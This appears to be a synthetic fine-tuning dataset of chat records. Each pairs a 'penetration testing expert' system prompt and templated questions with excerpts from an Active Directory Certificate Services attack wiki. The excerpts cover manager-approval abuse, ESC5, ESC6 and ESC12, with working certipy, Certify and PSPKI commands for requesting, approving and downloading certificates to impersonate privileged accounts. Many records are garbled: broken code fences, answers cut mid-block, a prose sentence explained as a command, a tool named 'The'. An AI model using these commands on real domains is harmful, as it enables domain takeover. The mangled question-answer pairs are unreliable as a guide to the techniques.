CS management tasks\".\n\n``powershell", "metadata": {"corpus_index": 30, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Retrieve an issued certificate?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -retrieve 100\n``\n\nThe certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both ManageCA and ManageCertificates are already obtained. There is no known method to obtain the ManageCertificates right.\n\nThen, PSPKI (PowerShell) can be used to approve a certificate request (RSAT is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\".\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Retrieve an issued certificate?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -retrieve 100\n``\n\nThe certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both ManageCA and ManageCertificates are already obtained. There is no known method to obtain the ManageCertificates right.\n\nThen, PSPKI (PowerShell) can be used to approve a certificate request (RSAT is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\".\n\n``powershell", "metadata": {"corpus_index": 30, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for retrieve an issued certificate?"}, {"role": "assistant", "content": "The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both `ManageCA` and `ManageCertificates` are already obtained. There is no known method to obtain the `ManageCertificates` right.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to approve a certificate request ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\"."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for retrieve an issued certificate?", "response": "The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both `ManageCA` and `ManageCertificates` are already obtained. There is no known method to obtain the `ManageCertificates` right.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to approve a certificate request ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\".", "metadata": {"corpus_index": 31, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Retrieve an issued certificate"}, {"role": "assistant", "content": "The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both `ManageCA` and `ManageCertificates` are already obtained. There is no known method to obtain the `ManageCertificates` right.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to approve a certificate request ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\"."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Retrieve an issued certificate", "response": "The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both `ManageCA` and `ManageCertificates` are already obtained. There is no known method to obtain the `ManageCertificates` right.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to approve a certificate request ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\".", "metadata": {"corpus_index": 31, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.`?"}, {"role": "assistant", "content": "This command is used for retrieve an issued certificate. Retrieve an issued certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The certificate can then be used with [Pass-The-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.`?", "response": "This command is used for retrieve an issued certificate. Retrieve an issued certificate", "metadata": {"corpus_index": 31, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 1. Request a certificate that requires manager approval with Certify"}, {"role": "assistant", "content": "Certify.exe request /ca:CA.domain.local\\CA /template:ApprovalNeeded\n...\n[*] Request ID : 1"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 1. Request a certificate that requires manager approval with Certify", "response": "Certify.exe request /ca:CA.domain.local\\CA /template:ApprovalNeeded\n...\n[*] Request ID : 1", "metadata": {"corpus_index": 32, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 1. Request a certificate that requires manager approval with Certify?"}, {"role": "assistant", "content": "Certify.exe request /ca:CA.domain.local\\CA /template:ApprovalNeeded\n...\n[*] Request ID : 1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 1. Request a certificate that requires manager approval with Certify?", "response": "Certify.exe request /ca:CA.domain.local\\CA /template:ApprovalNeeded\n...\n[*] Request ID : 1", "metadata": {"corpus_index": 32, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 3. Approve the pending request with PSPKI"}, {"role": "assistant", "content": "PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 3. Approve the pending request with PSPKI", "response": "PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest", "metadata": {"corpus_index": 33, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 3. Approve the pending request with PSPKI"}, {"role": "assistant", "content": "PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 3. Approve the pending request with PSPKI", "response": "PSPKI > Get-CertificationAuthority -ComputerName CA.domain.local | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest", "metadata": {"corpus_index": 33, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 4. Download the certificate with Certify"}, {"role": "assistant", "content": "Certify.exe download /ca:CA.domain.local\\CA /id:1\n```\n\n:::\n\n> [!WARNING]\n> \n> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).\n> \n> Currently, the best resources for manually abusing this are\n> \n> * the whitepaper (PDF)\n> * Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (by Olivier Lyak)\n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)\n> * AD CS Abuse (by snovvcrash)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 4. Download the certificate with Certify", "response": "Certify.exe download /ca:CA.domain.local\\CA /id:1\n```\n\n:::\n\n> [!WARNING]\n> \n> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).\n> \n> Currently, the best resources for manually abusing this are\n> \n> * the whitepaper (PDF)\n> * Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (by Olivier Lyak)\n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)\n> * AD CS Abuse (by snovvcrash)", "metadata": {"corpus_index": 34, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 4. Download the certificate with Certify"}, {"role": "assistant", "content": "Certify.exe download /ca:CA.domain.local\\CA /id:1\n```\n\n:::\n\n> [!WARNING]\n> \n> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).\n> \n> Currently, the best resources for manually abusing this are\n> \n> * the whitepaper (PDF)\n> * Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (by Olivier Lyak)\n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)\n> * AD CS Abuse (by snovvcrash)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 4. Download the certificate with Certify", "response": "Certify.exe download /ca:CA.domain.local\\CA /id:1\n```\n\n:::\n\n> [!WARNING]\n> \n> If sensitive rights are identified, creativity will be the best ally. Not much public tooling is available at the time of writing (October 21st, 2021).\n> \n> Currently, the best resources for manually abusing this are\n> \n> * the whitepaper (PDF)\n> * Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (by Olivier Lyak)\n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)\n> * AD CS Abuse (by snovvcrash)", "metadata": {"corpus_index": 34, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Access controls - Other objects (ESC5)"}, {"role": "assistant", "content": "This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.\n\n> [!TIP]\n> Read the DACL abuse article for more insight."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Access controls - Other objects (ESC5)", "response": "This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.\n\n> [!TIP]\n> Read the DACL abuse article for more insight.", "metadata": {"corpus_index": 35, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Access controls - Other objects (ESC5)"}, {"role": "assistant", "content": "This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.\n\n> [!TIP]\n> Read the DACL abuse article for more insight."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Access controls - Other objects (ESC5)", "response": "This can be enumerated and abused like regular AD access control abuses. Once control over an AD-CS-related is gained, creativity will be the attacker's best ally.\n\n> [!TIP]\n> Read the DACL abuse article for more insight.", "metadata": {"corpus_index": 35, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate authority - Certificate Authority misconfiguration"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.\n\nWhen the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) and allowing low-priv users to enroll can be abused to authenticate as any other user/machine/admin.\n\n> [!SUCCESS]\n> The default User template checks all the template requirements stated above.\n>\n> If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications), and the User template is enabled (which is very often), any user can escalate to domain admin.\n\n> [!CAUTION]\n> May 2022 security updates broke the ESC6 attack."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate authority - Certificate Authority misconfiguration", "response": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.\n\nWhen the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) and allowing low-priv users to enroll can be abused to authenticate as any other user/machine/admin.\n\n> [!SUCCESS]\n> The default User template checks all the template requirements stated above.\n>\n> If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications), and the User template is enabled (which is very often), any user can escalate to domain admin.\n\n> [!CAUTION]\n> May 2022 security updates broke the ESC6 attack.", "metadata": {"corpus_index": 36, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate authority - Certificate Authority misconfiguration"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.\n\nWhen the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) and allowing low-priv users to enroll can be abused to authenticate as any other user/machine/admin.\n\n> [!SUCCESS]\n> The default User template checks all the template requirements stated above.\n>\n> If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications), and the User template is enabled (which is very often), any user can escalate to domain admin.\n\n> [!CAUTION]\n> May 2022 security updates broke the ESC6 attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate authority - Certificate Authority misconfiguration", "response": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.\n\nWhen the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) and allowing low-priv users to enroll can be abused to authenticate as any other user/machine/admin.\n\n> [!SUCCESS]\n> The default User template checks all the template requirements stated above.\n>\n> If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications), and the User template is enabled (which is very often), any user can escalate to domain admin.\n\n> [!CAUTION]\n> May 2022 security updates broke the ESC6 attack.", "metadata": {"corpus_index": 36, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate authority - YubiHSM Key Storage Provider work?"}, {"role": "assistant", "content": "As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like \"Yubico YubiHSM2\", over storing it in the software storage.\n\nThis is a USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine. \n\n> In order to generate and use keys in the YubiHSM, the Key Storage Provider must use an authentication key (sometimes dubbed \"password\"). This key/password is stored in the registry under HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword in cleartext. \n> \n> Furthermore, the YubiHSM Key Storage Provider does not check under which user account processes calling it via CNG are running.\n>\n> (Hans-Joachim Knobloch)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate authority - YubiHSM Key Storage Provider work?", "response": "As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like \"Yubico YubiHSM2\", over storing it in the software storage.\n\nThis is a USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine. \n\n> In order to generate and use keys in the YubiHSM, the Key Storage Provider must use an authentication key (sometimes dubbed \"password\"). This key/password is stored in the registry under HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword in cleartext. \n> \n> Furthermore, the YubiHSM Key Storage Provider does not check under which user account processes calling it via CNG are running.\n>\n> (Hans-Joachim Knobloch)", "metadata": {"corpus_index": 37, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate authority - YubiHSM Key Storage Provider?"}, {"role": "assistant", "content": "As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like \"Yubico YubiHSM2\", over storing it in the software storage.\n\nThis is a USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine. \n\n> In order to generate and use keys in the YubiHSM, the Key Storage Provider must use an authentication key (sometimes dubbed \"password\"). This key/password is stored in the registry under HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword in cleartext. \n> \n> Furthermore, the YubiHSM Key Storage Provider does not check under which user account processes calling it via CNG are running.\n>\n> (Hans-Joachim Knobloch)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate authority - YubiHSM Key Storage Provider?", "response": "As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like \"Yubico YubiHSM2\", over storing it in the software storage.\n\nThis is a USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine. \n\n> In order to generate and use keys in the YubiHSM, the Key Storage Provider must use an authentication key (sometimes dubbed \"password\"). This key/password is stored in the registry under HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword in cleartext. \n> \n> Furthermore, the YubiHSM Key Storage Provider does not check under which user account processes calling it via CNG are running.\n>\n> (Hans-Joachim Knobloch)", "metadata": {"corpus_index": 37, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2 in the context of penetration testing"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the \"User Specified SAN\" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\nOnce the right template is found (i.e. the default User template) (how to enumerate), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2 in the context of penetration testing", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the \"User Specified SAN\" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\nOnce the right template is found (i.e. the default User template) (how to enumerate), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n``bash", "metadata": {"corpus_index": 38, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the \"User Specified SAN\" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\nOnce the right template is found (i.e. the default User template) (how to enumerate), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the \"User Specified SAN\" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\nOnce the right template is found (i.e. the default User template) (how to enumerate), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n``bash", "metadata": {"corpus_index": 38, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate authority - (esc6) editf_attributesubjectaltname2?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate authority - (esc6) 